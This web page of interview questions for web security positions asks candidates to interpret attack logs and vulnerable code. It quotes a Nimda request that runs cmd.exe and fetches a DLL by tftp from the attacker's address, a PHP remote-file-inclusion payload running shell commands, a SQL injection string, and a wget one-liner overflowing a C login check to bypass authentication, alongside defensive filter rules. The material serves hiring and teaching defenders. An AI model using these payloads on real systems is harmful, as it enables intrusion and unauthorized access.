Home > Web Security Interview Questions
The goal of this document is to provide
appropriate questions for HR/Managers to pose to individuals who are
applying for web security related positions. These questions do
not have right or wrong answers, but rather spark relevant conversation
between the applicant and the hiring staff.
Entry Level Questions
Goal of question – To gauge the applicant’s
knowledge of current web related threats. Topics such as Denial
of Service, Brute Force, Buffer Overflows, and Input Validation are
all relevant topics. Hopefully they will mention information provided
by web security organizations such as the Web Application Security Consortium
(WASC) or the Open Web Application Security Project (OWASP).
Goal of question – Determine if the
applicant utilizes computer security resources such as CERT, SANS Internet
Storm Center or ICAT. Email lists such as securityfocus, bugtraq,
SANS @RISK, etc. are also good resources. Recent examples of threats
will vary depending on current events, but issues such as new web based
worms (PHP Santy Worm) or applications, which are in wide use (awstats
scripts) are acceptable.
Goal of question – We are attempting
to see if the applicant has a wide knowledge of web security monitoring
and IDS issues such as:
Goal of question
–This question will determine if the applicant is well versed in the
terminology used in web security. The applicant needs to be able
to articulate highly technological topics to a wide audience.
The second question will help to verify that the applicant fully understands
how XSS attacks work and the impact to client information. WASC
has a web security glossary of terms that may be of help - http://www.webappsec.org/glossary.html
Cross-Site Scripting:
(Acronym – XSS) An attack technique that forces a web site to echo
client-supplied data, which execute in a user’s web browser. When
a user is Cross-Site Scripted, the attacker will have access to all
web browser content (cookies, history, application version, etc). XSS
attacks do not typically directly target the web server or application,
but are rather aimed at the client. The web server is merely used
as a conduit for the XSS data to be presented to the end client. See
also “Client-Side
Scripting”.
Goal of question
– Once again, there is no right or wrong answer, however we are interested
in what the applicant views as important.
Web Server Security:
Web Application Security:
Advanced Level Questions
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/
cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll
HTTP/1.0" 200 566 "-" "-"
Goal of question – To see if the
applicant is fluent at reading web server log files in the Common Log
Format (CLF). In this scenario, the client system (68.48.142.117)
is infected with the Nimda worm. These requests will not affect
our Apache proxy server since this is a Microsoft vulnerability.
While it does not impact Apache, the logs do indicate that the initial
request was successful (status code of 200). The Nimda worm will
only send the level 2 request (trying to use Trivial FTP to infect the
target) if the initial request is successful. Depending on the
exact proxying rules in place, it would be a good idea to inspect the
internal IIS server to verify that it has not been compromised.
If you were not using Apache as
the reverse proxy, what Microsoft application/tool could you use to
mitigate this attack?
You could use either Microsoft's Internet
and Security Acceleration (ISA) server as a front-end proxy or implement
URLScan on the target IIS server. The urlscan.ini file has the
AllowDotInPath directive which will block directory traversal attempts.
What are some examples of you how
you would attempt to gain access?
Goal of question –
Determine if the applicant has a wide knowledge of different authentication
vulnerabilities. They may attempt default usernames/passwords
or attempt SQL Injection queries that provide an SQL true statement
(such as – ‘ OR 1=1#). If they provide SQL examples, then
offer them the following Error document information and ask them what
this indicates.
ODBC
Error Code = 37000 (Syntax error or access violation) [Microsoft][ODBC SQL Server Driver][SQL
Server]Line 4: Incorrect syntax near '='. Data Source = "ECommerceTheArchSupport2" SQL = "SELECT QuickJump_Items.ItemId
FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId
=" The error occurred while processing an
element with a general identifier of (CFQUERY), occupying document position
(1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm The specific sequence of files included
or processed is: |
This error message indicates that the
target web application if running Microsoft SQL and discloses directory
structures.
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0” 403 769 “Microsoft Data Access Internet Publishing Provider DAV 1.1” “-“
What does this log entry indicate? How could you identify what the contents are of the “hacked.htm” file that the attacker is trying to upload?
Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule –
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)
“GET /cgi-bin/logon_validate?login=test&password=test”
The source code is shown below –
void
show_error(void) {
// AUTHENTICATION ERROR exit(-1); } int main(int argc, char **argv) { char error_on_auth='1'; char user[128]; char pass[128]; char *ch_ptr_begin; char *ch_ptr_end; /**********************************/ /* Get Username from Query String */ /**********************************/ ch_ptr_begin=(char *)strstr(****QUERY_STRING****,"login="); if (ch_ptr_begin==NULL) show_error(); ch_ptr_begin+=6; ch_ptr_end=(char *)strstr(ch_ptr_begin,"&"); if (ch_ptr_end==NULL) show_error(); *(ch_ptr_end++)='\0'; strcpy(user,ch_ptr_begin); /**********************************/ /* Get Password from Query String */ /**********************************/ ch_ptr_begin=(char *)strstr(ch_ptr_end,"password="); if (ch_ptr_begin==NULL) show_error(); ch_ptr_begin+=9; ch_ptr_end=(char *)strstr(ch_ptr_begin,"&"); if (ch_ptr_end!=NULL) *(ch_ptr_end++)='\0'; strcpy(pass,ch_ptr_begin); if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0)) error_on_auth='0'; if (error_on_auth=='0') {
// AUTHENTICATION OK!! } else { // AUTHENTICATION ERROR show_error(); } // return(0); hehe could be evil ;PPPPP exit(0); } |
This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php
Do you see any problems with this script? How could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options?
Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.
Reference “Smashing The Stack For Fun And Profit” for technical details –
http://www.phrack.org/phrack/49/P49-14
The security issue with this script has to do with a buffer overflow problem in the way that the script is using the “error_on_auth” condition. The error_on_auth condition is initially declared to be “1” which means that he user is not authenticated. The “user” condition was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack. The result is that if the attacker submits a username that is 129 bytes (with the last byte being “0”), they can overwrite the error_on_auth data. A Unix command such as the following would achieve this goal –
http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
or
# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e print "0"x129`
Mitigation options include the following:
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
</Location>
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”
SecFilterSelective ARG_LOGIN|ARG_PASSWORD “.{129,}”
</Location>
A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as "anomalous" and deny them. A brief listing of WAF vendors include Teros, Netcontiuum, Imperva, Watchfire, Breach, Axiliance, and others.
All Rights Reserved Powered by Free Document Search and Download
Copyright © 2011